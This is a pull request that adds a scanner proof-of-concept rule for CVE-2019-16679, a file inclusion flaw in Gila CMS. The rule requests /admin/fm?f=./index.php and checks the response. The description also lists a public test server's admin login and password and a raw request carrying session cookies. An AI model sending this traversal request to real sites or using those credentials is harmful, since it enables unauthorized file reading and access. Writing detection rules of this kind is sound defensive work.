### PR TITLE
add gilacms CVE-2019-16679

### DIFF
--- a/pocs/gilacms-cve-2019-16679.yml
+++ b/pocs/gilacms-cve-2019-16679.yml
@@ -1,0 +1,9 @@
+name: poc-yaml-gilacms-cve-2019-16679
+rules:
+  - method: GET
+    path: /admin/fm?f=./index.php
+    expression: response.status == 200 && response.body.bcontains(b"src/core/bootstrap.php")
+detail:
+  author: PickledFish(https://github.com/PickledFish)
+  links:
+    - https://packetstormsecurity.com/files/154578/Gila-CMS-Local-File-Inclusion.html


### PR DESCRIPTION
##  本 poc 是检测什么漏洞的
CVE-2019-16679
## 测试环境
[http://114.115.144.164/admin](http://114.115.144.164/admin)
账号：admin@gila.com
密码: 12345678
## 备注
此漏洞需要登录后测试，原漏洞可读取web目录外的文件，但是考虑到程序部署位置不同，所以读了web目录中的index.php,并用index.php文件源代码中的部分来验证
![image](https://user-images.githubusercontent.com/46182134/79416845-3adbab80-7fe3-11ea-9637-427e5206de9b.png)

r.txt

```
GET /admin HTTP/1.1
Host: 114.115.144.164
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://114.115.144.164/admin/fm?f=./index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=l1hino0p0htec6jervbje99gkn; GSESSIONID=1bssbbg2v6rrm8js3dtbeisol03g91d0z6zn9u8pzo31g977nl
Connection: close

```
